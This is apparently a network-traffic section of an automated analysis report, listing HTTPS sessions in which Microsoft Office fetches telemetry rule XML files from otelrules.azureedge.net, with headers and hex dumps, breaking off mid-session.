                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        103192.168.2.84991013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                        x-ms-request-id: e61fb942-301e-000c-78b4-43323f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063921Z-174f7845968vqt9xhC1EWRgten0000001440000000004sy6
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        104192.168.2.84990813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                        x-ms-request-id: 47663499-e01e-0051-6891-3f84b2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063921Z-174f7845968ljs8phC1EWRe6en00000013xg000000004z4n
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        105192.168.2.84990913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                        x-ms-request-id: ebed6b5e-401e-0015-4f72-400e8d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063921Z-174f7845968pf68xhC1EWRr4h800000014c0000000002z6b
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:21 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        106192.168.2.84991213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:22 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:22 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                        x-ms-request-id: ca68633c-201e-006e-1f8a-3fbbe3000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063922Z-174f7845968kvnqxhC1EWRmf3g0000000qt000000000beq8
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:22 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        107192.168.2.84991313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:23 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:23 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                        x-ms-request-id: 717d5930-e01e-001f-2a2b-441633000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063923Z-174f7845968zgtf6hC1EWRqd8s0000000wy000000000ba3s
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:23 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        108192.168.2.84991613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:23 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:23 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                        x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063923Z-174f7845968frfdmhC1EWRxxbw000000141g00000000a1sk
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        109192.168.2.84991413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:23 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:23 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                        x-ms-request-id: 44636861-901e-0083-5170-43bb55000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063923Z-174f7845968nxc96hC1EWRspw800000013wg000000001fe0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        110192.168.2.84991513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:23 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:23 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                        x-ms-request-id: 14abde1b-801e-0047-6aab-437265000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063923Z-174f7845968swgbqhC1EWRmnb40000001450000000009tdp
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        111192.168.2.84991713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:24 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:25 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:25 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                        x-ms-request-id: 8c7215b7-001e-00ad-4224-44554b000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063925Z-174f7845968j6t2phC1EWRcfe8000000148g000000003ed9
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:25 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        112192.168.2.84991813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:25 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:25 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                        x-ms-request-id: f24b5158-501e-0047-6a59-43ce6c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
